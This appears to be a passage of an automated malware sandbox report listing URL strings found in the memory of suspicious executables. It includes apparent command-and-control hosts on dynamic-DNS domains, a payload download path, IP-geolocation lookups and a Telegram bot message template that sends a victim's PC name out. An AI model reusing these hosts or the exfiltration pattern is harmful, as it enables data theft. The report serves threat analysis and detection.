jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: brightness.exe, 00000007.00000002.2129746891.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/
                  Source: brightness.exe, 00000007.00000002.2129746891.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.000000002059D000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2129746891.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg
                  Source: brightness.exe, 00000007.00000002.2129746891.000000000071D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002569C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: brightness.exe, 00000007.00000003.2123550803.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161107303.0000000021426000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163281507.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2128046542.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2162496281.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.7.drString found in binary or memory: http://ocsp.comodoca.com0$
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpString found in binary or 
memory: http://ocsp.sectigo.com0
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: brightness.exe, 00000007.00000003.2123550803.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161107303.0000000021426000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163281507.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2128046542.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2162496281.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.7.drString found in binary or memory: http://www.pmail.com0
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211D4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022893000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002289D000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021170000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C221000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022893000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002284D000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002289D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpString found in binary or 
memory: https://sectigo.com/CPS0
